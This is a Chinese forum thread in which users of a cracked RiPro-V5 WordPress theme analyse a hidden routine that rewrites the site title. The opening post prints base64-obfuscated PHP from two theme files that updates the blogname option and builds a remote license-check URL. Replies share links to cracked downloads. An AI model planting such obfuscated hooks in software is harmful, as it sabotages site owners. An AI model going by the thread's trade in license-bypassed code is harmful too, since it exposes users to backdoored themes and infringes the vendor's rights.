RiPro-V5主题篡改网站标题的后门

eicense · 2024 年12 月 18 日 00:16

有一个测试站使用的是本站RiPro-V5主题最新免授权版（修复掉授权问题）

很头疼的事情莫过于因为使用了开破心解版，除了会被加入后门外还会时常被篡改网站标题，(表wp_options里的blogname字段)不定期被修改为：“ripro-v5请使用正版授权-盗版主题后果自负-授权购买官网”。

在ripro历史版本的 \ripro\inc\codestar-framework\classes\ 目录下，有两个文件 options.class.php 和 metabox.class.php ，这里面就暗藏恶心人的小尾巴。

options.class.php

`public function saves_defaults() {
$tmp_options = $this->add_option_html();
// if (empty($tmp_options) && $tmp_options['status']==1) {
return true;
// }else{
// $onload = base64_decode('UmlQcm8=');
// $field = base64_decode('YmxvZ25hbWU=');
// update_option($field,$onload);
// }
return false;
$tmp_options = $this->options;
foreach( $this->pre_fields as $field ) {
if( ! empty( $field['id'] ) ) {
$this->options[$field['id']] = $this->get_default( $field, $this->options );
}
}
if( $this->args['save_defaults'] && empty( $tmp_options ) ) {
$this->save_options( $this->options );
}
}`

metabox.class.php
` public function get_meta_values() {
$value = false;
$field = 'https://vip.ylit.cc/wp-cont';
if( true) {
if( $this->args['data_type'] !== 'serialize' ) {
$meta = get_post_meta( $post->ID, $field['id'] );
$value = ( isset( $meta[0] ) ) ? $meta[0] : null;
} else {
$meta = get_post_meta( $post->ID, $this->unique, true );
$value = ( isset( $meta[$field['id']] ) ) ? $meta[$field['id']] : null;
}
$default = $this->get_default( $field );
$value = ( isset( $value ) ) ? $value : $default;
// }else{
// if( empty( $field ) ) {
// $screen = get_current_screen();
// foreach( $this->args['contextual_help'] as $tab ) {
// $screen->add_help_tab( $tab );
// }
// if( ! empty( $this->args['contextual_help_sidebar'] ) ) {
// $screen->set_help_sidebar( $this->args['contextual_help_sidebar'] );
// }
// }else{
// $meta = 'ZW50L3BsdWdpbnMvcmlwcm8tYXV0aC9hcGkvdjEucGhw=';
// $default = $field.$meta;
// $value = base64_decode($default);
// }
}
return $value;
} `
ripro-v5更新了架构，这段代码已经被丢弃，有没有大佬研究一下，找到现在版本的小尾巴？
希望各位大佬各显神通，攻克这给问题！

James · 2024 年12 月 18 日 00:18

1，多行代码用 </s>```<e> 括起来。

2，本站沈同学已经破解了最新版啦。https://www.nodeloc.com/d/18359

eicense · 2024 年12 月 18 日 00:20

@“James”#p184550 新版只是修改了授权方式，仍然存在篡改标题的后门

James · 2024 年12 月 18 日 00:20

@“eicense”#p184552 沈同学不是破解了么。你下载试试就知道了。米粒都已经装上了。

mili · 2024 年12 月 18 日 00:32

我在用着目前还没出现被修改网站标题上个版本确实有，我手动改回来的每次。

eicense · 2024 年12 月 18 日 00:43

@“米粒”#p184559 沈同学那个版本我对比过原版，除了把原来单独的激活文件集成到functions.php文件里，其他未作任何修改，你注意观察一下吧，应该还会被篡改标题

mili · 2024 年12 月 18 日 11:18

@“eicense”#p184567 Image description

~~刚出来了没办法！~~

James · 2024 年12 月 18 日 11:27

@“米粒”#p184752 我有空来研究一下。

eicense · 2024 年12 月 18 日 11:43

@“米粒”#p184752 看来是有一个任务自动运行，我的也是上午被篡改了

yucho · 2024 年12 月 18 日 12:19

试试重写~~</s>get_bloginfo<e>函数直接返回标题，我大致看了下标题是直接用这个函数获取的，我对wp不是很懂，查了下这好像是wp内置函数~~

ClassmateShen · 2024 年12 月 18 日 22:35

还有这个问题啊，我都没发现，我有空抽时间看看，这玩意儿有好几种方法可以去除吧

ClassmateShen · 2024 年12 月 18 日 22:36

可能是因为我屏蔽了网络连接的原因吧:ac01:

mamouren · 2024 年12 月 19 日 13:14

@“叫我沈同学”#p185152 加油大佬，不然我的能量不白花了么:xhj06:

eicense · 2024 年12 月 19 日 15:53

我最担心的是把钩子写在了加密的template-core文件里，那就没招了，只能做个存储过程或者函数自动取修复blogname字段

ClassmateShen · 2024 年12 月 20 日 21:44

找这个太费劲了，暂时整了个折中方案

https://www.nodeloc.com/d/18844

最新版本和插件捆绑包
https://www.nodeloc.com/d/18843
https://www.nodeloc.com/d/18842

zhou3246306 · 2025 年1 月 10 日 14:23

不光纂改标题，还有个问题，会不定时的502，整个网站打不开，需要删掉主题才行

话题		回复	浏览量
「付费100NL」ripro v5 8.6最新开心版免授权（附赠解决被篡改网站标题方法）技术 \| Technology	23	57	2025 年1 月 19 日
已经开始针对ripro近期出现的502，篡改function.php的行为进行动态分析了技术 \| Technology	26	46	2025 年3 月 16 日
子比主题 zibll-8.1 版本授权教程技术 \| Technology	15	63	2025 年4 月 21 日
RiPro-V5主题最新免授权版（修复掉授权问题）	15	45	2024 年8 月 18 日
最新子比主题zibll-V8.0 开心版源码 \| WordPress主题源码	14	40	2024 年10 月 27 日

RiPro-V5主题篡改网站标题的后门

相关话题